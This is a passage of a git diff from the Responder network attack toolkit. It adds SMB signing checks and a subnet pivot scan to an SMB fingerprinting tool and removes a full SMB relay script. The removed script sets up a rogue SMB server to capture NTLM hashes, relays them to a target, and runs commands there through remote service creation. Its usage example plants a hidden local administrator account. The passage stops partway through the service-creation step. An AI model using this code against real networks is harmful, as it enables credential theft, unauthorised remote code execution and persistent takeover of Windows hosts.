CalculateWorkstationOffset = str(self.fields["NLMPAuthMsgSignature"])+str(self.fields["NLMPAuthMsgMessageType"])+str(self.fields["NLMPAuthMsgLMChallengeLen"])+str(self.fields["NLMPAuthMsgLMChallengeMaxLen"])+str(self.fields["NLMPAuthMsgLMChallengeBuffOffset"])+str(self.fields["NLMPAuthMsgNtChallengeResponseLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"])+str(self.fields["NLMPAuthMsgNtDomainNameLen"])+str(self.fields["NLMPAuthMsgNtDomainNameMaxLen"])+str(self.fields["NLMPAuthMsgNtDomainNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtUserNameLen"])+str(self.fields["NLMPAuthMsgNtUserNameMaxLen"])+str(self.fields["NLMPAuthMsgNtUserNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtWorkstationLen"])+str(self.fields["NLMPAuthMsgNtWorkstationMaxLen"])+str(self.fields["NLMPAuthMsgNtWorkstationBuffOffset"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"])+str(self.fields["NLMPAuthMsgNtNegotiateFlags"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NLMPAuthMsgNtDomainName"])+str(self.fields["NLMPAuthMsgNtUserName"])
CalculateLMChallengeOffset = str(self.fields["NLMPAuthMsgSignature"])+str(self.fields["NLMPAuthMsgMessageType"])+str(self.fields["NLMPAuthMsgLMChallengeLen"])+str(self.fields["NLMPAuthMsgLMChallengeMaxLen"])+str(self.fields["NLMPAuthMsgLMChallengeBuffOffset"])+str(self.fields["NLMPAuthMsgNtChallengeResponseLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"])+str(self.fields["NLMPAuthMsgNtDomainNameLen"])+str(self.fields["NLMPAuthMsgNtDomainNameMaxLen"])+str(self.fields["NLMPAuthMsgNtDomainNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtUserNameLen"])+str(self.fields["NLMPAuthMsgNtUserNameMaxLen"])+str(self.fields["NLMPAuthMsgNtUserNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtWorkstationLen"])+str(self.fields["NLMPAuthMsgNtWorkstationMaxLen"])+str(self.fields["NLMPAuthMsgNtWorkstationBuffOffset"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"])+str(self.fields["NLMPAuthMsgNtNegotiateFlags"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NLMPAuthMsgNtDomainName"])+str(self.fields["NLMPAuthMsgNtUserName"])+str(self.fields["NLMPAuthMsgNtWorkstationName"])
CalculateNTChallengeOffset = str(self.fields["NLMPAuthMsgSignature"])+str(self.fields["NLMPAuthMsgMessageType"])+str(self.fields["NLMPAuthMsgLMChallengeLen"])+str(self.fields["NLMPAuthMsgLMChallengeMaxLen"])+str(self.fields["NLMPAuthMsgLMChallengeBuffOffset"])+str(self.fields["NLMPAuthMsgNtChallengeResponseLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"])+str(self.fields["NLMPAuthMsgNtDomainNameLen"])+str(self.fields["NLMPAuthMsgNtDomainNameMaxLen"])+str(self.fields["NLMPAuthMsgNtDomainNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtUserNameLen"])+str(self.fields["NLMPAuthMsgNtUserNameMaxLen"])+str(self.fields["NLMPAuthMsgNtUserNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtWorkstationLen"])+str(self.fields["NLMPAuthMsgNtWorkstationMaxLen"])+str(self.fields["NLMPAuthMsgNtWorkstationBuffOffset"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"])+str(self.fields["NLMPAuthMsgNtNegotiateFlags"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NLMPAuthMsgNtDomainName"])+str(self.fields["NLMPAuthMsgNtUserName"])+str(self.fields["NLMPAuthMsgNtWorkstationName"])+str(self.fields["NLMPAuthLMChallengeStr"])
## Packet len
self.fields["andxoffset"] = struct.pack("<i", len(CompletePacketLen)+32)[:2]
##Buff Len
self.fields["securitybloblength"] = struct.pack("<i", len(SecurityBlobLen))[:2]
##Complete Buff Len
self.fields["bcc1"] = struct.pack("<i", len(SecurityBlobBCC))[:2]
## Guest len check
self.fields["ApplicationHeaderLen"] = struct.pack("<i", len(SecurityBlobLen)-2)[:1]
self.fields["AsnSecMechLen"] = struct.pack("<i", len(SecurityBlobLen)-4)[:1]
self.fields["ChoosedTagLen"] = struct.pack("<i", len(SecurityBlobLen)-6)[:1]
self.fields["ChoosedTag1StrLen"] = struct.pack("<i", len(SecurityBlobLen)-8)[:1]
##### Username Offset Calculation..######
self.fields["NLMPAuthMsgNtUserNameBuffOffset"] = struct.pack("<i", len(CalculateUserOffset))
self.fields["NLMPAuthMsgNtUserNameLen"] = struct.pack("<i", len(str(self.fields["NLMPAuthMsgNtUserName"])))[:2]
self.fields["NLMPAuthMsgNtUserNameMaxLen"] = struct.pack("<i", len(str(self.fields["NLMPAuthMsgNtUserName"])))[:2]
##### Domain Offset Calculation..######
self.fields["NLMPAuthMsgNtDomainNameBuffOffset"] = struct.pack("<i", len(CalculateDomainOffset))
self.fields["NLMPAuthMsgNtDomainNameLen"] = struct.pack("<i", len(str(self.fields["NLMPAuthMsgNtDomainName"])))[:2]
self.fields["NLMPAuthMsgNtDomainNameMaxLen"] = struct.pack("<i", len(str(self.fields["NLMPAuthMsgNtDomainName"])))[:2]
##### Workstation Offset Calculation..######
self.fields["NLMPAuthMsgNtWorkstationBuffOffset"] = struct.pack("<i", len(CalculateWorkstationOffset))
self.fields["NLMPAuthMsgNtWorkstationLen"] = struct.pack("<i", len(str(self.fields["NLMPAuthMsgNtWorkstationName"])))[:2]
self.fields["NLMPAuthMsgNtWorkstationMaxLen"] = struct.pack("<i", len(str(self.fields["NLMPAuthMsgNtWorkstationName"])))[:2]
##### NT Challenge Offset Calculation..######
self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"] = struct.pack("<i", len(CalculateNTChallengeOffset))
self.fields["NLMPAuthMsgNtChallengeResponseLen"] = struct.pack("<i", len(str(self.fields["NLMPAuthMsgNTLMV1ChallengeResponseStruct"])))[:2]
self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"] = struct.pack("<i", len(str(self.fields["NLMPAuthMsgNTLMV1ChallengeResponseStruct"])))[:2]
##### LM Challenge Offset Calculation..######
self.fields["NLMPAuthMsgLMChallengeBuffOffset"] = struct.pack("<i", len(CalculateLMChallengeOffset))
self.fields["NLMPAuthMsgLMChallengeLen"] = struct.pack("<i", len(str(self.fields["NLMPAuthLMChallengeStr"])))[:2]
self.fields["NLMPAuthMsgLMChallengeMaxLen"] = struct.pack("<i", len(str(self.fields["NLMPAuthLMChallengeStr"])))[:2]
######################################################################################################
class SMBTreeConnectData(Packet):
fields = OrderedDict([
("Wordcount", "\x04"),
("AndXCommand", "\xff"),
("Reserved","\x00" ),
("Andxoffset", "\x5a\x00"),
("Flags","\x08\x00"),
("PasswdLen", "\x01\x00"),
("Bcc","\x2f\x00"),
("Passwd", "\x00"),
("Path",""),
("PathTerminator","\x00\x00"),
("Service","?????"),
("Terminator", "\x00"),
])
def calculate(self):
##Convert Path to Unicode first before any Len calc.
self.fields["Path"] = self.fields["Path"].encode('utf-16le')
##Passwd Len
self.fields["PasswdLen"] = struct.pack("<i", len(str(self.fields["Passwd"])))[:2]
##Packet len
CompletePacket = str(self.fields["Wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["Reserved"])+str(self.fields["Andxoffset"])+str(self.fields["Flags"])+str(self.fields["PasswdLen"])+str(self.fields["Bcc"])+str(self.fields["Passwd"])+str(self.fields["Path"])+str(self.fields["PathTerminator"])+str(self.fields["Service"])+str(self.fields["Terminator"])
self.fields["Andxoffset"] = struct.pack("<i", len(CompletePacket)+32)[:2]
##Bcc Buff Len
BccComplete = str(self.fields["Passwd"])+str(self.fields["Path"])+str(self.fields["PathTerminator"])+str(self.fields["Service"])+str(self.fields["Terminator"])
self.fields["Bcc"] = struct.pack("<i", len(BccComplete))[:2]
class SMBTransRAPData(Packet):
fields = OrderedDict([
("Wordcount", "\x10"),
("TotalParamCount", "\x00\x00"),
("TotalDataCount","\x00\x00" ),
("MaxParamCount", "\xff\xff"),
("MaxDataCount","\xff\xff"),
("MaxSetupCount", "\x00"),
("Reserved","\x00\x00"),
("Flags", "\x00"),
("Timeout","\x00\x00\x00\x00"),
("Reserved1","\x00\x00"),
("ParamCount","\x00\x00"),
("ParamOffset", "\x5c\x00"),
("DataCount", "\x00\x00"),
("DataOffset", "\x54\x00"),
("SetupCount", "\x02"),
("Reserved2", "\x00"),
("PeekNamedPipe", "\x23\x00"),
("FID", "\x00\x00"),
("Bcc", "\x47\x00"),
("Terminator", "\x00"),
("PipeName", "\\PIPE\\"),
("PipeTerminator","\x00\x00"),
("Data", ""),
])
def calculate(self):
#Padding
if len(str(self.fields["Data"]))%2==0:
self.fields["PipeTerminator"] = "\x00\x00\x00\x00"
else:
self.fields["PipeTerminator"] = "\x00\x00\x00"
##Convert Path to Unicode first before any Len calc.
self.fields["PipeName"] = self.fields["PipeName"].encode('utf-16le')
##Data Len
self.fields["TotalParamCount"] = struct.pack("<i", len(str(self.fields["Data"])))[:2]
self.fields["ParamCount"] = struct.pack("<i", len(str(self.fields["Data"])))[:2]
##Packet len
FindRAPOffset = str(self.fields["Wordcount"])+str(self.fields["TotalParamCount"])+str(self.fields["TotalDataCount"])+str(self.fields["MaxParamCount"])+str(self.fields["MaxDataCount"])+str(self.fields["MaxSetupCount"])+str(self.fields["Reserved"])+str(self.fields["Flags"])+str(self.fields["Timeout"])+str(self.fields["Reserved1"])+str(self.fields["ParamCount"])+str(self.fields["ParamOffset"])+str(self.fields["DataCount"])+str(self.fields["DataOffset"])+str(self.fields["SetupCount"])+str(self.fields["Reserved2"])+str(self.fields["PeekNamedPipe"])+str(self.fields["FID"])+str(self.fields["Bcc"])+str(self.fields["Terminator"])+str(self.fields["PipeName"])+str(self.fields["PipeTerminator"])
self.fields["ParamOffset"] = struct.pack("<i", len(FindRAPOffset)+32)[:2]
##Bcc Buff Len
BccComplete = str(self.fields["Terminator"])+str(self.fields["PipeName"])+str(self.fields["PipeTerminator"])+str(self.fields["Data"])
self.fields["Bcc"] = struct.pack("<i", len(BccComplete))[:2]

148
tools/SMBFinger/Finger.py
View File

@@ -15,19 +15,14 @@
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import re,sys,socket,struct
import multiprocessing
from socket import *
from time import sleep
from odict import OrderedDict
import optparse
__version__ = "0.3"
__version__ = "0.7"
parser = optparse.OptionParser(usage='python %prog -i 10.10.10.224\nor:\npython %prog -i 10.10.10.0/24', version=__version__, prog=sys.argv[0])
parser.add_option('-i','--ip', action="store", help="Target IP address or class C", dest="TARGET", metavar="10.10.10.224", default=None)
options, args = parser.parse_args()
Timeout = 0.3
Host = options.TARGET
Timeout = 2
class Packet():
fields = OrderedDict([
@@ -130,6 +125,15 @@ class SMBNegoDataLanMan(Packet):
#####################
def color(txt, code = 1, modifier = 0):
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
def IsSigningEnabled(data):
if data[39] == "\x0f":
return True
else:
return False
def atod(a):
return struct.unpack("!L",inet_aton(a))[0]
@@ -139,15 +143,22 @@ def dtoa(d):
def OsNameClientVersion(data):
try:
length = struct.unpack('<H',data[43:45])[0]
OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]])
return OsVersion, ClientVersion
if length > 255:
OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[48+length:].split('\x00\x00\x00')[:2]])
return OsVersion, ClientVersion
if length <= 255:
OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]])
return OsVersion, ClientVersion
except:
return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
def GetHostnameAndDomainName(data):
try:
DomainJoined, Hostname = tuple([e.replace('\x00','') for e in data[81:].split('\x00\x00\x00')[:2]])
#If max length domain name, there won't be a \x00\x00\x00 delineator to split on
if Hostname == '':
DomainJoined = data[81:110].replace('\x00','')
Hostname = data[113:].replace('\x00','')
return Hostname, DomainJoined
except:
return "Could not get Hostname.", "Could not get Domain joined"
@@ -168,6 +179,7 @@ def DomainGrab(Host):
buffer0 = longueur(packet0)+packet0
s.send(buffer0)
data = s.recv(2048)
s.close()
if data[8:10] == "\x72\x00":
return GetHostnameAndDomainName(data)
except:
@@ -189,6 +201,7 @@ def SmbFinger(Host):
buffer0 = longueur(packet0)+packet0
s.send(buffer0)
data = s.recv(2048)
signing = IsSigningEnabled(data)
if data[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00")
t = SMBSessionFingerData()
@@ -197,10 +210,33 @@ def SmbFinger(Host):
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
s.close()
if data[8:10] == "\x73\x16":
return OsNameClientVersion(data)
OsVersion, ClientVersion = OsNameClientVersion(data)
return signing, OsVersion, ClientVersion
except:
pass
def SmbFingerSigning(Host):
s = socket(AF_INET, SOCK_STREAM)
try:
s.settimeout(Timeout)
s.connect((Host, 445))
except:
return False
try:
h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
n = SMBNego(Data = SMBNegoData())
n.calculate()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(buffer0)
data = s.recv(2048)
signing = IsSigningEnabled(data)
return signing
except:
pass
##################
#run it
def ShowResults(Host):
@@ -212,14 +248,71 @@ def ShowResults(Host):
return False
try:
print "Retrieving information for %s..."%Host[0]
OsVer, LanManClient = SmbFinger(Host)
print "Os version: '%s'\nLanman Client: '%s'"%(OsVer, LanManClient)
Hostname, DomainJoined = DomainGrab(Host)
print "Machine Hostname: '%s'\nThis machine is part of the '%s' domain\n"%(Hostname, DomainJoined)
Signing, OsVer, LanManClient = SmbFinger(Host)
enabled = color("SMB signing is mandatory. Choose another target", 1, 1)
disabled = color("SMB signing: False", 2, 1)
print color("Retrieving information for %s..."%Host[0], 8, 1)
print enabled if Signing else disabled
print color("Os version: '%s'"%(OsVer), 8, 3)
print color("Hostname: '%s'\nPart of the '%s' domain"%(Hostname, DomainJoined), 8, 3)
except:
pass
def ShowSmallResults(Host):
s = socket(AF_INET, SOCK_STREAM)
try:
s.settimeout(Timeout)
s.connect(Host)
except:
return False
try:
Hostname, DomainJoined = DomainGrab(Host)
Signing, OsVer, LanManClient = SmbFinger(Host)
Message = color("\n[+] Client info: ['%s', domain: '%s', signing:'%s']"%(OsVer, DomainJoined, Signing),4,0)
return Message
except:
pass
def ShowScanSmallResults(Host):
s = socket(AF_INET, SOCK_STREAM)
try:
s.settimeout(Timeout)
s.connect(Host)
except:
return False
try:
Hostname, DomainJoined = DomainGrab(Host)
Signing, OsVer, LanManClient = SmbFinger(Host)
Message ="['%s', Os:'%s', Domain:'%s', Signing:'%s']"%(Host[0], OsVer, DomainJoined, Signing)
print Message
except:
pass
def ShowSigning(Host):
s = socket(AF_INET, SOCK_STREAM)
try:
s.settimeout(Timeout)
s.connect((Host, 445))
except:
print "[Pivot Verification Failed]: Target host is down"
return True
try:
Signing = SmbFingerSigning(Host)
if Signing == True:
print "[Pivot Verification Failed]:Signing is enabled. Choose another host."
return True
else:
return False
except:
pass
def RunFinger(Host):
m = re.search("/", str(Host))
if m :
@@ -231,4 +324,23 @@ def RunFinger(Host):
else:
ShowResults((Host,445))
RunFinger(Host)
def RunPivotScan(Host, CurrentIP):
m = re.search("/", str(Host))
if m :
net,_,mask = Host.partition('/')
mask = int(mask)
net = atod(net)
threads = []
for host in (dtoa(net+n) for n in range(0, 1<<32-mask)):
if CurrentIP == host:
pass
else:
p = multiprocessing.Process(target=ShowScanSmallResults, args=((host,445),))
threads.append(p)
p.start()
sleep(1)
else:
ShowScanSmallResults((Host,445))

0
tools/SMBFinger/__init__.py Normal file
View File

422
tools/SMBRelay.py
View File

@@ -1,422 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import random
import optparse
import thread
sys.path.append('../')
from fingerprint import RunSmbFinger
from socket import *
from RelayPackets import *
from packets import *
from servers.SMB import *
from packets import Packet
import logging
Logs = logging
Logs.basicConfig(filemode="w",filename='SMBRelay-Session.txt',format='',level=logging.DEBUG)
def longueur(payload):
return struct.pack(">i", len(''.join(payload)))
def UserCallBack(op, value, dmy, parser):
args=[]
for arg in parser.rargs:
if arg[0] != "-":
args.append(arg)
if getattr(parser.values, op.dest):
args.extend(getattr(parser.values, op.dest))
setattr(parser.values, op.dest, args)
parser = optparse.OptionParser(usage="python %prog -i 10.20.30.40 -c 'net user Responder Quol0eeP/e}X /add &&net localgroup administrators Responder /add' -t 10.20.30.45 -u Administrator lgandx admin", prog=sys.argv[0],)
parser.add_option('-i','--ip', action="store", help="The ip address to redirect the traffic to. (usually yours)", metavar="10.20.30.40",dest="Responder_IP")
parser.add_option('-c',action='store', help='Command to run on the target.',metavar='"net user Responder Quol0eeP/e}X /ADD"',dest='CMD')
parser.add_option('-t',action="store", help="Target server for SMB relay.",metavar="10.20.30.45",dest="TARGET")
parser.add_option('-d',action="store", help="Target Domain for SMB relay (optional). This can be set to overwrite a domain logon (DOMAIN\Username) with the gathered credentials. Woks on NTLMv1",metavar="WORKGROUP",dest="Domain")
parser.add_option('-u', '--UserToRelay', action="callback", callback=UserCallBack, dest="UserToRelay")
options, args = parser.parse_args()
if options.CMD is None:
print "\n-c mandatory option is missing, please provide a command to execute on the target.\n"
parser.print_help()
exit(-1)
elif options.TARGET is None:
print "\n-t mandatory option is missing, please provide a target.\n"
parser.print_help()
exit(-1)
elif options.UserToRelay is None:
print "\n-u mandatory option is missing, please provide a username to relay.\n"
parser.print_help()
exit(-1)
ResponderPATH = os.path.dirname(__file__)
UserToRelay = options.UserToRelay
Domain = options.Domain
Command = options.CMD
Target = options.TARGET
Responder_IP = options.Responder_IP
print "\nResponder SMBRelay 0.1\nPlease send bugs/comments to: laurent.gaffie@gmail.com"
print '\033[31m'+'Use this script in combination with Responder.py for best results (remember to set SMB = Off in Responder.conf)..\nUsernames to relay (-u) are case sensitive.'+'\033[0m'
print 'To kill this script hit CRTL-C or Enter\nWill relay credentials for these users: '+'\033[1m\033[34m'+', '.join(UserToRelay)+'\033[0m\n'
#Function used to verify if a previous auth attempt was made.
def ReadData(outfile,Client, User, cmd=None):
try:
with open(ResponderPATH+outfile,"r") as filestr:
if cmd is None:
String = Client+':'+User
if re.search(String.encode('hex'), filestr.read().encode('hex')):
return True
return False
if cmd is not None:
String = Client+","+User+","+cmd
if re.search(String.encode('hex'), filestr.read().encode('hex')):
print "[+] Command: %s was previously executed on host: %s. Won't execute again.\n" %(cmd, Client)
return True
return False
except:
raise
#Function used to parse SMB NTLMv1/v2
def ParseHash(data,Client, Target):
try:
lenght = struct.unpack('<H',data[43:45])[0]
LMhashLen = struct.unpack('<H',data[51:53])[0]
NthashLen = struct.unpack('<H',data[53:55])[0]
Bcc = struct.unpack('<H',data[63:65])[0]
if NthashLen >= 30:
Hash = data[65+LMhashLen:65+LMhashLen+NthashLen]
pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2]
var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]]
Username, Domain = tuple(var)
if ReadData("SMBRelay-Session.txt", Client, Username):
print "[+]Auth from user %s with host %s previously failed. Won't relay."%(Username, Client)
if Username in UserToRelay:
print '%s sent a NTLMv2 Response..\nVictim OS is : %s. Passing credentials to: %s'%(Client,RunSmbFinger((Client, 445)),Target)
print "Username : ",Username
print "Domain (if joined, if not then computer name) : ",Domain
return data[65:65+LMhashLen],data[65+LMhashLen:65+LMhashLen+NthashLen],Username,Domain, Client
if NthashLen == 24:
pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2]
var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]]
Username, Domain = tuple(var)
if ReadData("SMBRelay-Session.txt", Client, Username):
print "Auth from user %s with host %s previously failed. Won't relay."%(Username, Client)
if Username in UserToRelay:
print '%s sent a NTLMv1 Response..\nVictim OS is : %s. Passing credentials to: %s'%(Client,RunSmbFinger((Client, 445)),Target)
LMHashing = data[65:65+LMhashLen].encode('hex').upper()
NTHashing = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()
print "Username : ",Username
print "Domain (if joined, if not then computer name) : ",Domain
return data[65:65+LMhashLen],data[65+LMhashLen:65+LMhashLen+NthashLen],Username,Domain, Client
else:
print "'%s' user was not specified in -u option, won't relay authentication. Allowed users to relay are: %s"%(Username,UserToRelay)
except Exception:
raise
#Detect if SMB auth was Anonymous
def Is_Anonymous(data):
LMhashLen = struct.unpack('<H',data[51:53])[0]
if LMhashLen == 0 or LMhashLen == 1:
print "SMB Anonymous login requested, trying to force client to auth with credz."
return True
return False
def ParseDomain(data):
return ''.join(data[81:].split('\x00\x00\x00')[:1])+'\x00\x00\x00'
#Function used to know which dialect number to return for NT LM 0.12
def Parse_Nego_Dialect(data):
DialectStart = data[40:]
pack = tuple(DialectStart.split('\x02'))[:10]
var = [e.replace('\x00','') for e in DialectStart.split('\x02')[:10]]
test = tuple(var)
if test[0] == "NT LM 0.12":
return "\x00\x00"
if test[1] == "NT LM 0.12":
return "\x01\x00"
if test[2] == "NT LM 0.12":
return "\x02\x00"
if test[3] == "NT LM 0.12":
return "\x03\x00"
if test[4] == "NT LM 0.12":
return "\x04\x00"
if test[5] == "NT LM 0.12":
return "\x05\x00"
if test[6] == "NT LM 0.12":
return "\x06\x00"
if test[7] == "NT LM 0.12":
return "\x07\x00"
if test[8] == "NT LM 0.12":
return "\x08\x00"
if test[9] == "NT LM 0.12":
return "\x09\x00"
if test[10] == "NT LM 0.12":
return "\x0a\x00"
def SmbRogueSrv139(key,Target,DomainMachineName):
s = socket(AF_INET,SOCK_STREAM)
s.setsockopt(SOL_SOCKET,SO_REUSEADDR, 1)
s.settimeout(30)
try:
s.bind(('0.0.0.0', 139))
s.listen(0)
conn, addr = s.accept()
except error, msg:
if "Address already in use" in msg:
print '\033[31m'+'Something is already listening on TCP 139, did you set SMB = Off in Responder.conf..?\nSMB Relay will not work.'+'\033[0m'
try:
while True:
data = conn.recv(1024)
##session request 139
if data[0] == "\x81":
buffer0 = "\x82\x00\x00\x00"
conn.send(buffer0)
##Negotiate proto answer.
if data[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x72",flag1="\x98", flag2="\x53\xc8",pid=pidcalc(data),tid=tidcalc(data))
t = SMBNegoAns(Dialect=Parse_Nego_Dialect(data),Key=key,Domain=DomainMachineName)
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
conn.send(buffer1)
##Session Setup AndX Request
if data[8:10] == "\x73\x00":
if Is_Anonymous(data):
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x03\xc8",errorcode="\x6d\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
packet1 = str(head)+str(SMBSessEmpty())
buffer1 = longueur(packet1)+packet1
conn.send(buffer1)
else:
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x03\xc8",errorcode="\x6d\x00\x00\xC0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
packet1 = str(head)+str(SMBSessEmpty())#Return login fail anyways.
buffer1 = longueur(packet1)+packet1
conn.send(buffer1)
Credz = ParseHash(data,addr[0],Target)
return Credz
except:
return None
def RunRelay(host, Command,Domain):
Target = host
CMD = Command
print "Target is running: ", RunSmbFinger((host, 445))
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, 445))
h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x03\xc7",pid="\xff\xfe", tid="\xff\xff")
n = SMBNego(Data = SMBNegoData())
n.calculate()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(buffer0)
data = s.recv(2048)
Key = ParseAnswerKey(data,host)
DomainMachineName = ParseDomain(data)
if data[8:10] == "\x72\x00":
try:
a = SmbRogueSrv139(Key,Target,DomainMachineName)
if a is not None:
LMHash,NTHash,Username,OriginalDomain, CLIENTIP = a
if Domain is None:
Domain = OriginalDomain
if ReadData("SMBRelay-Session.txt", Target, Username, CMD):
pass
else:
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x03\xc8",pid="\xff\xfe",mid="\x01\x00")
t = SMBSessionTreeData(AnsiPasswd=LMHash,UnicodePasswd=NTHash,Username=Username,Domain=Domain,Targ=Target)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
except:
raise
a = None
if data[8:10] == "\x73\x6d":
print "[+] Relay failed, auth denied. This user doesn't have an account on this target."
Logs.info(CLIENTIP+":"+Username)
if data[8:10] == "\x73\x0d":
print "[+] Relay failed, SessionSetupAndX returned invalid parameter. It's most likely because both client and server are >=Windows Vista"
Logs.info(CLIENTIP+":"+Username)
## NtCreateAndx
if data[8:10] == "\x73\x00":
print "[+] Authenticated, trying to PSexec on target !"
head = SMBHeader(cmd="\xa2",flag1="\x18", flag2="\x02\x28",mid="\x03\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBNTCreateData()
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## Fail Handling.
if data[8:10] == "\xa2\x22":
print "[+] Exploit failed, NT_CREATE denied. SMB Signing mandatory or this user has no privileges on this workstation?"
## DCE/RPC Write.
if data[8:10] == "\xa2\x00":
head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
x = SMBDCEData()
x.calculate()
f = data[42:44]
t = SMBWriteData(FID=f,Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC Read.
if data[8:10] == "\x2f\x00":
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x05\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBReadData(FID=f)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC SVCCTLOpenManagerW.
if data[8:10] == "\x2e\x00":
head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x06\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x03\x00")
w.calculate()
x = SMBDCEPacketData(Data=w)
x.calculate()
t = SMBWriteData(FID=f,Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC Read Answer.
if data[8:10] == "\x2f\x00":
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x07\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBReadData(FID=f)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC SVCCTLCreateService.
if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?"
print "[+] Creating service"
